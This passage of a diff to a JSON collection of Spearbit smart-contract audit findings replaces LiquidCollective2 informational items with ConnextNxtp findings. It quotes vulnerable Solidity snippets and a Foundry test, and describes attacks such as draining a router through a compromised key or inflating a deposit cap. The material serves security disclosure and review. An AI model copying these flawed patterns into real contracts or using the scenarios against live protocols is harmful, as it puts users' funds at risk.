_moveVotingPower(delegates(from), delegates(to), amount); will decrease the voting power of delegates(from) by amount and will increase the voting power of delegates(to) by amount. This applies if some conditions are true, but you can see them here function _moveVotingPower( address src, address dst, uint256 amount ) private { if (src != dst && amount > 0) { if (src != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[src], _subtract, ,! amount); emit DelegateVotesChanged(src, oldWeight, newWeight); } if (dst != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[dst], _add, amount); emit DelegateVotesChanged(dst, oldWeight, newWeight); } } } When a vesting schedule is created, the creator has two options: 1) Specify a custom delegatee different from the beneficiary (or equal to it, but it's the same as option 2). 2) Leave the delegatee empty (equal to address(0)). Scenario 1) empty delegatee OR delegatee === beneficiary (same thing) After creating the vesting schedule, the voting power of the beneficiary will be equal to the amount of tokens vested. If the beneficiary did not call tlc.delegate(beneficiary) previously, after releasing some tokens, its voting power will be decreased by the amount of released tokens. 23 Scenario 2) delegatee !== beneficiary && delegatee !== address(0) Same thing as before, but now we have two different actors, one is the beneficiary and another one is the delegatee of the voting power of the vested tokens. If the beneficiary did not call tlc.delegate(vestingScheduleDelegatee) previously, after releasing some to- kens, the voting power of the current vested schedule's delegatee will be decreased by the amount of released tokens. Related test for scenario 1 //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testLosingPowerAfterRelease() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: false }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); assertEq(tlc.getVotes(alice), 10); 24 assertEq(tlc.balanceOf(alice), 0); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); tlc.releaseVestingSchedule(0); // Alice now owns the vested tokens just released but her voting power has decreased by the ,! amount released assertEq(tlc.getVotes(alice), 9); assertEq(tlc.balanceOf(alice), 1); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "title": "Messages destined for ZkSync cannot be processed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For ZkSync chain, L2 to L1 communication is free, but L1 to L2 communication requires a certain amount of ETH to be supplied to cover the base cost of the transaction (including the _l2Value) + layer 2 operator tip. The _sendMessage function of ZkSyncHubConnector.sol relies on the IZkSync(AMB).requestL2Transaction function to send messages from L1 to L2. However, the requestL2Transaction call will always fail because no ETH is supplied to the transaction (msg.value is zero). As a result, the ZkSync's hub connector on Ethereum cannot forward the latest aggregated Merkle root to the ZkSync's spoke connector on ZkSync chain. Thus, any message destined for ZkSync chain cannot be processed since incoming messages cannot be proven without the latest aggregated Merkle root. 16 function _sendMessage(bytes memory _data) internal override { // Should always be dispatching the aggregate root require(_data.length == 32, \"!length\"); // Get the calldata bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data); // Dispatch message // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#structure](https://v2-docs.zksync.io/d ,! ev/developer-guides/Bridging/l1-l2.html#structure) // calling L2 smart contract from L1 Example contract // note: msg.value must be passed in and can be retrieved from the AMB view function ,! `l2TransactionBaseCost` c // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in-your-proje ct](https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in- your-project) c c ,! ,! IZkSync(AMB).requestL2Transaction{value: msg.value}( // The address of the L2 contract to call mirrorConnector, // We pass no ETH with the call 0, // Encoding the calldata for the execute _calldata, // Ergs limit 10000, // factory dependencies new bytes[]0 ); } Additionally, the ZkSync's hub connector contract needs to be loaded with ETH so that it can forward the appro- priate amount of ETH when calling the ZkSync's requestL2Transaction. However, it is not possible to do so because no receive(), fallback or payable function has been implemented within the contract and its parent contracts for accepting ETH.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Fix mismatch between revert error message and code behavior", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The error message requires the schedule duration to be greater than the cliff duration, but the code allows it to be greater than or equal to the cliff duration.", + "title": "Cross-chain messaging via Multichain protocol will fail", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Multichain v6 is supported by Connext for cross-chain messaging. The _sendMessage function of BaseMultichain.sol relies on Multichain's anyCall for cross-chain messaging. Per the Anycall V6 documentation, a gas fee for transaction execution needs to be paid either on the source or destination chain when an anyCall is called. However, the anyCall is called without consideration of the gas fee within the connectors, and thus the anyCall will always fail. Since Multichain's hub and spoke connectors are unable to send messages, cross-chain messaging using Multichain within Connext will not work. 17 function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable _data, address(0), // fallback address on origin chain MIRROR_CHAIN_ID, 0 // fee paid on origin chain ); } Additionally, for the payment of the execution gas fee, a project can choose to implement either of the following methods: Pay on the source chain by depositing the gas fee to the caller contracts. Pay on the destination chain by depositing the gas fee to Multichain's anyCall contract at the destination chain. If Connext decides to pay the gas fee on the source chain, they would need to deposit some ETH to the connector contracts. However, it is not possible because no receive(), fallback or payable function has been implemented within the contracts and their parent contracts for accepting ETH.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Improve documentation and naming of period variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Similar to Consider renaming period to periodDuration to be more descriptive, the variable name and documentation are ambiguous. We can give a more descriptive name to the variable and fix the documenta- tion.", + "title": "_domainSeparatorV4() not updated after name/symbol change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The BridgeToken allows updating the name and symbol of a token. However the _CACHED_DOMAIN_- SEPARATOR (of EIP712) isn't updated. This means that permit(), which uses _hashTypedDataV4() and _CACHED_- DOMAIN_SEPARATOR, still uses the old value. On the other hand DOMAIN_SEPARATOR() is updated. Both and especially their combination can give unexpected results. BridgeToken.sol function setDetails(string calldata _newName, string calldata _newSymbol) external override onlyOwner { // careful with naming convention change here token.name = _newName; token.symbol = _newSymbol; emit UpdateDetails(_newName, _newSymbol); } OZERC20.sol 18 function DOMAIN_SEPARATOR() external view override returns (bytes32) { // See {EIP712._buildDomainSeparator} return keccak256( abi.encode(_TYPE_HASH, keccak256(abi.encode(token.name)), _HASHED_VERSION, block.chainid, ,! address(this)) ); } function permit(...) ... { ... bytes32 _hash = _hashTypedDataV4(_structHash); ... } draft-EIP712.sol import \"./EIP712.sol\"; EIP712.sol function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) { return ECDSA.toTypedDataHash(_domainSeparatorV4(), structHash); } function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) { return _CACHED_DOMAIN_SEPARATOR; } else { return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION); } }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming period to periodDuration to be more descriptive", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "period can be confused as (for example) a counter or an id.", + "title": "diamondCut() allows re-execution of old updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once diamondCut() is executed, ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _- init, _calldata))] is not reset to zero. This means the contract owner can rerun the old updates again without any delay by executing diamondCut() function. Assume the following: diamondCut() function is executed to update the facet selector with version_2 A bug is found in ver- sion_2 and it is rolled back Owner can still execute diamondCut() function which will again update the facet selector to version 2 since ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] is still valid", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider removing coverageFunds variable and explicitly initialize executionLayerFees to zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Inside the OracleManager.setConsensusLayerData the coverageFunds variable is declared but never used. Consider cleaning the code by removing the unused variable. The executionLayerFees variable instead should be explicitly initialized to zero to not rely on compiler assump- tions.", + "title": "User may not be able to override slippage on destination", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If BridgeFacet.execute() is executed before BridgeFacet.forceUpdateSlippage(), user won't be able to update slippage on the destination chain. In this case, the slippage specified on the source chain is used. Due to different conditions on these chains, a user may want to specify different slippage values. This can result in user loss, as a slippage higher than necessary will result the swap trade being sandwiched.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming IVestingScheduleManagerV1 interface to IERC20VestableVotesUpgradeableV1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The IVestingScheduleManager interface contains all ERC20VestableVotesUpgradeableV1 needs to implement and use. the events, errors, and functions that Because there's no corresponding VestingScheduleManager contract implementation, it would make sense to rename the interface to IERC20VestableVotesUpgradeableV1.", + "title": "Do not rely on token balance to determine when cap is reached", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Connext Diamond defines a cap on each token. Any transfer making the total token balance more than the cap is reverted. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } Anyone can send tokens to Connext Diamond to artificially increase the custodied amount since it depends on the token balance. This can be an expensive attack but it can become viable if price of a token (including next assets) drops.", "labels": [ - "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "Spearbit", + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider renaming CoverageFundAddress COVERAGE_FUND_ADDRESS to be consistent with the current naming convention", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Consider renaming the constant used to access the unstructured storage slot COVERAGE_FUND_- ADDRESS. To follow the naming convention already adopted across all the contracts, the variable should be renamed to COVERAGE_FUND_ADDRESS_SLOT.", + "title": "Router recipient can be configured more than once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comments from the setRouterRecipient function mentioned that the router should only be able to set the recipient once. Otherwise, no problem is solved. However, based on the current implementation, it is possible for the router to set its recipient more than once. /** File: RoutersFacet.sol 394: 395: 396: 397: 398: 399: 400: 401: * @notice Sets the designated recipient for a router * @dev Router should only be able to set this once otherwise if router key compromised, * no problem is solved since attacker could just update recipient * @param router Router address to set recipient * @param recipient Recipient Address to set to router */ function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { Let's assume that during router setup, the setupRouter function is being called and the owner is set to Alice's first EOA (0x123), and the recipient is set to Alice's second EOA (0x456). Although the comment mentioned that the setRouterRecipient should only be set once, this is not true because this function will only revert if the _- prevRecipient == recipient. As long as the new recipient is not the same as the previous recipient, the function will happily accept the new recipient. Therefore, if the router's signing key is compromised by Bob (attacker), he could call the setRouterRecipient function to change the new recipient to his personal EOA and drain the funds within the router. The setRouterRecipient function is protected by onlyRouterOwner modifier. Since Bob's has the compromised router's signing key, he will be able to pass this validation check. 21 /** File: RoutersFacet.sol 157: 158: 159: 160: 161: 162: 163: 164: 165: _; } * @notice Asserts caller is the router owner (if set) or the router itself */ modifier onlyRouterOwner(address _router) { address owner = s.routerPermissionInfo.routerOwners[_router]; if (!((owner == address(0) && msg.sender == _router) || owner == msg.sender)) revert RoutersFacet__onlyRouterOwner_notRouterOwner(); The second validation is at Line 404, which checks if the new recipient is not the same as the previous recipient. The recipient variable is set to Bob's EOA wallet, while _prevRecipient variable is set to Alice's second EOA (0x456). Therefore, the condition at Line 404 is False, and it will not revert. So Bob successfully set the recipient to his EOA at Line 407. File: RoutersFacet.sol 401: 402: 403: 404: 405: 406: 407: function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { // Check recipient is changing address _prevRecipient = s.routerPermissionInfo.routerRecipients[router]; if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient(); // Set new recipient s.routerPermissionInfo.routerRecipients[router] = recipient; Per the Github discussion, the motivation for such a design is the following: If a routers signing key is compromised, the attacker could drain the liquidity stored on the contract and send it to any specified address. This effectively means the key is in control of all unused liquidity on chain, which prevents router operators from adding large amounts of liquidity directly to the contract. Routers should be able to delegate the safe withdrawal address of any unused liquidity, creating a separation of concerns between router key and liquidity safety. In summary, the team is trying to create a separation of concerns between router key and liquidity safety. With the current implementation, there is no security benefit of segregating the router owner role and recipient role unless the router owner has been burned (e.g. set to address zero). Because once the router's signing key is compromised, the attacker can change the recipient anyway. The security benefits of separation of concerns will only be achieved if the recipient can truly be set only once.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider reverting if the msg.value is zero in CoverageFundV1.donate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "In the current implementation of CoverageFundV1.donate there is no check on the msg.value value. Because of this, the sender can \"spam\" the function and emit multiple useless Donate events.", + "title": "The set of tokens in an internal swap pool cannot be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the _pooledTo- kens or the set of tokens used in this stable swap pool cannot be updated. Now the s.swapStorages[_key] pools are used in other facets for assets that have the hash of their canonical token id and canonical domain equal to _key, for example when we need to swap between a local and adopted asset or when a user provides liquidity or interact with other external endpoints of StableSwapFacet. If the submitted set of tokens to this pool _pooledTokens beside the local and adopted token corresponding to _key include some other bad/malicious tokens, users' funds can be at risk in the pool in question. If this happens, we need to pause the protocol, push an update, and initializeSwap again.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider having a separate function in River contract that allows CoverageFundV1 to send funds instead of using the same function used by ELFeeRecipientV1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "When the River contract calls the CoverageFundV1 contract to pull funds, the CoverageFundV1 sends funds to River by calling IRiverV1(payable(river)).sendELFees{value: amount}();. sendELFees is a function that is currently used by both CoverageFundV1 and ELFeeRecipientV1. function sendELFees() external payable { if (msg.sender != ELFeeRecipientAddress.get() && msg.sender != CoverageFundAddress.get()) { revert LibErrors.Unauthorized(msg.sender); } } It would be cleaner to have a separate function callable only by the CoverageFundV1 contract.", + "title": "An incorrect decimal supplied to initializeSwap for a token cannot be corrected", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the decimal precisions per tokens, and therefore tokenPrecisionMultipliers cannot be changed. If the supplied decimals also include a wrong value, it would cause incorrect calculation when a swap is being made and currently there is no update mechanism for tokenPrecisionMultipliers nor a mechanism for removing the swapStorages[_key].", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Extensively document how the Coverage Funds contract works", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The Coverage Fund contract has a crucial role inside the Protocol, and the current contract's docu- mentation does not properly cover all the needed aspects. Consider documenting the following aspects: General explanation of the Coverage Funds and it's purpose. Will donations happen only after a slash/penalty event? Or is there a \"budget\" that will be dumped on the contract regardless of any slashing events? If a donation of XXX ETH is made, how is it handled? In a single transaction or distributed over a period of time? Explain carefully that when ETH is donated, no shares are minted. Explain all the possible market repercussions of the integration of Coverage Funds. Is there any off-chain validation process before donating? 29 Who are the entities that are enabled to donate to the fund? How is the Coverage Funds integrated inside the current Alluvial protocol? Any additional information useful for the users, investors, and other actors that interact with the protocol.", + "title": "Presence of delegate not enforced", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A delegate address on the destination chain can be used to fix stuck transactions by changing the slippage limits and by re-executing transactions. However, the presence of a delegate address isn't checked in _xcall(). Note: set to medium risk because tokens could get lost 23 function forceUpdateSlippage(TransferInfo calldata _params, uint256 _slippage) external ,! onlyDelegate(_params) { ... } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { (bytes32 transferId, DestinationTransferStatus status) = _executeSanityChecks(_args); ... } function _executeSanityChecks(ExecuteArgs calldata _args) private view returns (bytes32, ,! DestinationTransferStatus) { // If the sender is not approved relayer, revert if (!s.approvedRelayers[msg.sender] && msg.sender != _args.params.delegate) { revert BridgeFacet__execute_unapprovedSender(); } }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Missing/wrong natspec comment and typos", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": " Natspec Missing part of the natspec comment for /// @notice Attempt to revoke at a relative to InvalidRevokedVestingScheduleEnd in IVestingScheduleManager Natspec missing the @return part for getVestingSchedule in IVestingScheduleManager. Wrong order of natspec @param for createVestingSchedule in IVestingScheduleManager. The @param _beneficiary should be placed before @param _delegatee to follow the function signature order. Natspec missing the @return part for delegateVestingEscrow in IVestingScheduleManager. Wrong natspec comment, operators should be replaced with vesting schedules for @custom:attribute of struct SlotVestingSchedule in VestingSchedules. 30 Wrong natspec parameter, replace operator with vesting schedule in the VestingSchedules.push func- tion. Missing @return natspec for _delegateVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _deterministicVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _getCurrentTime in ERC20VestableVotesUpgradeable. Add the Coverage Funds as a source of \"extra funds\" in the Oracle._pushToRiver natspec documentation in Oracle. Update the InvalidCall natspec in ICoverageFundV1 given that the error is thrown also in the receive() external payable function of CoverageFundV1. Update the natspec of struct VestingSchedule lockDuration attribute in VestingSchedules by explaining that the lock duration of a vesting schedule could possibly exceed the overall duration of the vesting. Update the natspec of lockDuration in ERC20VestableVotesUpgradeable by explaining that the lock dura- tion of a vesting schedule could possibly exceed the overall duration of the vesting. Consider making the natspec documentation of struct VestingSchedule in VestingSchedules and the natspec in ERC20VestableVotesUpgradeable be in sync. Add more examples (variations) to the natspec documentation of the vesting schedules example in ERC20VestableVotesUpgradeable to explain all the possible combination of scenarios. Make the ERC20VestableVotesUpgradeable natspec documentation about the vesting schedule consis- tent with the natspec documentation of _createVestingSchedule and VestingSchedules struct Vest- ingSchedule. Typos Replace all Overriden instances with Overridden in River. Replace transfer with transfers in ERC20VestableVotesUpgradeable.1.sol#L147. Replace token with tokens in ERC20VestableVotesUpgradeable.1.sol#L156.", + "title": "Relayer could lose funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The xReceive function on the receiver side can contain unreliable code which Relayer is unaware of. In the future, more relayers will participate in completing the transaction. Consider the following scenario: 1. Say that Relayer A executes the xReceive function on receiver side. 2. In the xReceive function, a call to withdraw function in a foreign contract is made where Relayer A is holding some balance. 3. If this foreign contract is checking tx.origin (say deposit/withdrawal were done via third party), then Relayer A's funds will be withdrawn without his permission (since tx.origin will be the Relayer).", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Different behavior between River _pullELFees and _pullCoverageFunds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Both _pullELFees and _pullCoverageFunds implement the same functionality: Pull funds from a contract address. Update the balance storage variable. Emit an event. Return the amount of balance collected from the contract. The _pullCoverageFunds differs from the _pullELFees implementation by avoiding both updating the Balance- ToDeposit when collectedCoverageFunds == 0 and emitting the PulledCoverageFunds event. Because they are implementing the same functionality, they should follow the same behavior if there is not an explicit reason to not do so. 31", + "title": "TypedMemView.sameType does not use the correct right shift value to compare two bytes29s", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function sameType should shift 2 x 12 + 3 bytes to access the type flag (TTTTTTTTTT) when comparing it to 0. This is due to the fact that when using bytes29 type in bitwise operations and also comparisons to 0, a paramater of type bytes29 is zero padded from the right so that it fits into a uint256 under the hood. 0x TTTTTTTTTT AAAAAAAAAAAAAAAAAAAAAAAA LLLLLLLLLLLLLLLLLLLLLLLL 00 00 00 Currently, sameType only shifts the xored value 2 x 12 bytes so the comparison compares the type flag and the 3 leading bytes of memory address in the packing specified below: // First 5 bytes are a type flag. // - ff_ffff_fffe is reserved for unknown type. // - ff_ffff_ffff is reserved for invalid types/errors. // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The function is not used in the codebase but can pose an important issue if incorporated into the project in the future. function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> (2 * TWELVE_BYTES) == 0; }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Move local mask variable from Allowlist.1.sol to LibAllowlistMasks.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "LibAllowlistMasks.sol is meant to contain all mask values, but DENY_MASK is a local variable in the Allowlist.1.sol contract.", + "title": "Incorrect formula for the scaled amplification coefficient in NatSpec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the context above, the scaled amplification coefficient a is described by the formula An(n (cid:0) 1) where A is the actual amplification coefficient in the stable swap invariant equation for n tokens. * @param a the amplification coefficient * n * (n - 1) ... The actual adjusted/scaled amplification coefficient would need to be Ann(cid:0)1 and not An(n (cid:0) 1), otherwise, most of the calculations done when swapping between 2 tokens in a pool with more than 2 tokens would be wrong. For the special case of n = 2, those values are actually equal 22(cid:0)1 = 2 = 2 (cid:1) 1. So for swaps or pools that involve only 2 tokens, the issue in the comment is not so critical. But if the number of tokens are more than 2, then we need to make sure we calculate and feed the right parameter to AppStorage.swapStorages.{initial, future}A", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider adding additional parameters to the existing events to improve filtering/monitoring", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Some already defined events could be improved by adding more parameters to better track those events in dApps or monitoring tools. Consider adding address indexed delegatee as an event's parameter to event CreatedVestingSchedule. While it's true that after the vest/lock period the beneficiary will be the owner of those tokens, in the meanwhile (if _delegatee != address(0)) the voting power of all those vested tokens are delegated to the _delegatee. Consider adding address indexed beneficiary to event ReleasedVestingSchedule. Consider adding uint256 newEnd to event RevokedVestingSchedule to track the updated end of the vesting schedule. Consider adding address indexed beneficiary to event DelegatedVestingEscrow. If those events parameters are added to the events, the Alluvial team should also remember to update the relative natspec documentation.", + "title": "RootManager.propagate does not operate in a fail-safe manner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A bridge failure on one of the supported chains will cause the entire messaging network to break down. When the RootManager.propagate function is called, it will loop through the hub connector of all six chains (Ar- bitrum, Gnosis, Multichain, Optimism, Polygon, ZKSync) and attempt to send over the latest aggregated root by making a function call to the respective chain's AMB contract. There is a tight dependency between the chain's AMB and hub connector. The problem is that if one of the function calls to the chain's AMB contract reverts (e.g. one of the bridges is paused), the entire RootManager.propagate function will revert, and the messaging network will stop working until someone figure out the problem and manually removes the problematic hub connector. As Connext grows, the number of chains supported will increase, and the risk of this issue occurring will also increase.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Missing indexed keyword in events parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Some events parameters are missing the indexed keyword. Indexing specific parameters is partic- ularly important to later be able to filter those events both in dApps or monitoring tools. coverageFund event parameter should be declared as indexed in event SetCoverageFund. Both oldDelegatee and newDelegatee should be indexed in event DelegatedVestingEscrow. donator should be declared as indexed in event Donate.", + "title": "Arborist once whitelisted cannot be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Arborist has the power to write over the Merkle root. In case Arborist starts misbehaving (compro- mised or security issue) then there is no way to remove this Arborist from the whitelist.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Add natspec documentation to the TLC contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The current implementation of TLC contract is missing natspec at the root level to explain the contract. The natspec should cover the basic explanation of the contract (like it has already been done in other contracts like River.sol) but also illustrate TLC token has a fixed max supply that is minted at deploy time. All the minted tokens are sent to a single account at deploy time. How TLC token will be distributed. How voting power works (you have to delegate to yourself to gain voting power). How the vesting process works. Other general information useful for the user/investor that receives the TLC token directly or vested.", + "title": "WatcherManager is not set correctly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The setWatcherManager function missed to actually update the watcherManager, instead it is just emitting an event mentioning that Watcher Manager is updated when it is not. This could become a problem once new modules are added/revised in WatcherManager contract and Watcher- Client wants to use this upgraded WatcherManager. WatcherClient will be forced to use the outdated Watcher- Manager contract code.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Verify user has indeed voted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "If an error is made in the merkle trees (either by accident or on purpose) a user that did not vote (in that period for that gauge) might get rewards assigned to him. Although the Paladin documentation says: \"the Curve DAO contract does not offer a mapping of votes for each Gauge for each Period\", it might still be possible to verify that a user has voted if the account, gauge and period are known. Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", + "title": "Check __GAPs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "All __GAPs have the same size, while the different contracts have a different number of storage variables. If the __GAP size isn't logical it is more difficult to maintain the code. Note: set to a risk rating of medium because the probably of something going wrong with future upgrades is low to medium, and the impact of mistakes would be medium to high. LPToken.sol: uint256[49] private __GAP; // should probably be 50 OwnerPausableUpgradeable.sol: uint256[49] private __GAP; // should probably be 50 uint256[49] private __GAP; // should probably be 48 StableSwap.sol: uint256[49] private __GAP; // should probably be 48 Merkle.sol: uint256[49] private __GAP; // should probably be 47 ProposedOwnable.sol: 27", "labels": [ "Spearbit", - "Paladin", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Medium Risk LPToken.sol#L16, OwnerPausableUpgradeable.sol#L16, StableSwap.sol#L39, Merkle.sol#L37," ] }, { - "title": "Tokens could be sent / withdrawn multiple times by accident", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Functions closeQuestPeriod() and closePartOfQuestPeriod() have similar functionality but in- terfere with each other. 1. Suppose you have closed the first quest of a period via closePartOfQuestPeriod(). Now you cannot use closeQuestPeriod() to close the rest of the periods, as closeQuestPeriod() checks the state of the first quest. 2. Suppose you have closed the second quest of a period via 